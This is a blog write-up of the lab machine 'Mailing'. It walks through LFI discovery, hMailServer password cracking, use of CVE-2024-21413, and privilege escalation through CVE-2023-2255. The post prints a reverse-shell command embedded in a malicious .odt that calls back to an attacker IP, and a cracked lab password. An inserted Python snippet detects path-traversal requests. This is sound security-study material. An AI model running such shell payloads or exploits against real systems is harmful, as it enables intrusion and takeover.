Mailing

Mailing

  • I scanned all ports, subdirectories and PHP files. Also, copies of the scans are attached here.

Initial Access

  • I discovered some PHP files from my ffuf scans, and one interesting one was this:
download                [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 326ms]
  • Requesting download.php made me more curious:
curl 'mailing.htb/download.php'
No file specified for download.
  • From that result I figured out that there’s a param, probably file.

  • And I was correct: the param was file, and it returned an error page:

curl 'mailing.htb/download.php?file='
---snip--- 
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
  • Of course, it was clearly LFI, which I confirmed later on.

  • After doing some research about hMailServer, I discovered some locations where its files are stored:

  • Passing AdministratorPassword to CrackStation, I got the password in clear text:

  • After doing some recon about this, I discovered a CVE in Microsoft Outlook that reveals the NTLM hash: CVE-2024-21413

  • I cracked that and got user maya, password m4y4ngs4ri
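
For defenders reviewing web logs, requests that abuse a download parameter like the file parameter of download.php above can be flagged automatically. The following is an added example, not part of the original write-up; the request lines, the paths in them and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_REQUESTS = [  # constructed, not from the original write-up
    "/download.php?file=instructions.pdf",
    "/download.php?file=",
    "/download.php?file=..%2F..%2Fexample%2Fconfig.ini",
    "/download.php?file=%252e%252e%255c%252e%252e%255cexample.ini",
    "/download.php?file=C:%5Cexample%5Cconfig.ini",
    "/index.php?page=home",
]


def fully_decode(value, max_rounds=5):
    """Undo nested URL-encoding so that %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(request_target, script="/download.php", param="file"):
    """Return findings for the download parameter; [] means nothing flagged."""
    parts = urlsplit(request_target)
    if parts.path.lower() != script:
        return []
    findings = []
    # parse_qsl already decodes once; anything left to decode was nested.
    for key, once in parse_qsl(parts.query, keep_blank_values=True):
        if key != param:
            continue
        value = fully_decode(once)
        if value == "":
            findings.append("empty")
        if value != once:
            findings.append("nested-encoding")
        norm = value.replace("\\", "/")  # treat Windows separators alike
        if ".." in norm.split("/"):
            findings.append("traversal")
        if norm.startswith("/") or re.match(r"[A-Za-z]:", norm):
            findings.append("absolute-path")
    return findings


def scan(requests):
    """Map each flagged request target to its findings."""
    return {r: f for r in requests if (f := classify(r))}
```

Calling scan(SAMPLE_REQUESTS) returns only the four flagged request targets with their findings; an empty file value is reported because it is what produced the 500 error shown earlier.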

Privilege Escalation

  • I discovered that LibreOffice was outdated and found a CVE to exploit it. Also, the directory C:\Important Documents was writable.

  • CVE

  • I compiled rcat for Windows and put rcat.exe in C:\ProgramData

python3 CVE-2023-2255.py --cmd 'C:\ProgramData\rcat.exe connect 10.10.16.4 9999' --output 'hack.odt'
  • I started a listener with netcat on the attacker: nc -lvnp 9999. I put hack.odt in C:\Important Documents and after like 30 seconds I got a shell as localadmin.

Pwned

Mailing
https://fuwari.vercel.app/posts/mailing/
Author
Trevohack
Published at
2024-09-01